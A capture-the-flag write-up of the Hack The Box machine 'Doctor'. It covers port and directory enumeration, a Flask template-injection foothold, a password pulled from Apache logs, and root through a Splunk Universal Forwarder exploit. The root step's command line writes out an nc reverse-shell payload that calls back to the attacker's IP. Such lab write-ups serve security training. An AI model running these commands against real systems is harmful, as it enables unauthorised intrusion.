Doctor is a linux machine rated as easy from Hack The Box, it consists on finding a virtual hosts which contains a messaging service vulnerable to server-side template injection, then after obtaining access a root shell can be obtained abusing splunk forwarder.
Running nmap :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 nmap -sC -sV doctor.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST Nmap scan report for doctor.htb (10.129.18.114) Host is up (0.047s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Doctor 8089/tcp open ssl/http Splunkd httpd | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2020-09-06T15:57:27 |_Not valid after: 2023-09-06T15:57:27 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browsing to port 80 we find the following page :
Scrolling down a bit we can see an email : email@example.com so I decided to add it to my hosts file as it could be a virtual host.
Browsing to doctors.htb we are greeted with a login form , but there’s an option to register new users:
So we can create an account and access the site :
Once being logged in we can create messages :
Now, we can use gobuster to discover hidden directories :
1 2 3 4 5 6 7 gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q /register (Status: 200) /account (Status: 302) /archive (Status: 200) /login (Status: 200) /home (Status: 302) /logout (Status: 302)
Browsing to /archive it seems that it is empty but inspecting the source code we can see the title of our message:
1 2 3 4 5 6 7 <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Archive</title> <item><title>Test</title></item> </channel>
Checking wappalyzer we see the site has been built using flask and python 3:
Taking this into account, we can try to see if the site is vulnerable to SSTI (server-side template injection), to do it we will input a mathematical expression and then check if it has been evaluated:
Going to /archive we see we have got the result of the mathematical operation , so the site is vulnerable to ssti :
1 2 3 4 5 6 7 8 9 10 11 <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Archive</title> <item><title>Test</title></item> </channel> <item><title>14</title></item> </channel>
Now we can try to get a python reverse shell using a payload from PayloadAllTheThings
After posting the message we trigger it browsing to /archive, checking netcat we get a reverse shell as web:
1 2 3 4 5 6 7 8 nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186 /bin/sh: 0: can't access tty; job control turned off $ id uid=1001(web) gid=1001(web) groups=1001(web),4(adm) $ whoami web
Now we need to pivot to other user, shaun :
1 2 web@doctor:/home$ ls shaun web
Inside the apache2 logs folder, there was a file which caught my attention called backup :
1 2 3 4 5 6 7 8 9 web@doctor:/var/log/apache2$ ls access.log access.log.6.gz error.log.11.gz error.log.6.gz access.log.1 access.log.7.gz error.log.12.gz error.log.7.gz access.log.10.gz access.log.8.gz error.log.13.gz error.log.8.gz access.log.11.gz access.log.9.gz error.log.14.gz error.log.9.gz access.log.2.gz backup error.log.2.gz other_vhosts_access.log access.log.3.gz error.log error.log.3.gz access.log.4.gz error.log.1 error.log.4.gz access.log.5.gz error.log.10.gz error.log.5.gz
Grepping for a password inside it we get the credentials for pivoting to shaun :
1 2 3 4 5 6 web@doctor:/var/log/apache2$ cat backup | grep password 10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password" web@doctor:/var/log/apache2$ su shaun Password: shaun@doctor:/var/log/apache2$ id uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
Going back to the nmap scan, we found that port 8089 was open running Splunk.
Inside /opt directory there was another dir called splunkforwarder :
1 2 shaun@doctor:/opt$ ls clean splunkforwarder
Searching for splunkforwarder privilege escalation I came across the following exploit
This github repo contains two exploits, a local and a remote one, as the exploit was written in python2 and the machine had python3 I decided to go with the remote exploit .
With this exploit we can abuse Splunk Universal Forwarder by configuring it to use our machine as deployment server, then we the connection is done our machine will send a malicious code as deployment applications.
For running the exploit remotely we need to use shaun credentials instead of the default ones, then we can specify the payload to obtain a reverse shell through netcat.
Running the exploit :
1 2 3 4 5 6 7 8 9 10 11 12 python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f' [.] Authenticating... [+] Authenticated [.] Creating malicious app bundle... [+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar [+] Started HTTP server for remote mode [.] Installing app from: http://10.10.14.161:8181/ 10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 - [+] App installed, your code should be running now! Press RETURN to cleanup
Checking netcat we have obtained a root shell :
1 2 3 4 5 6 7 8 9 nc -lvnp 4444 listening on [any] 4444 ... connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832 # whoami root # id uid=0(root) gid=0(root) groups=0(root) # hostname doctor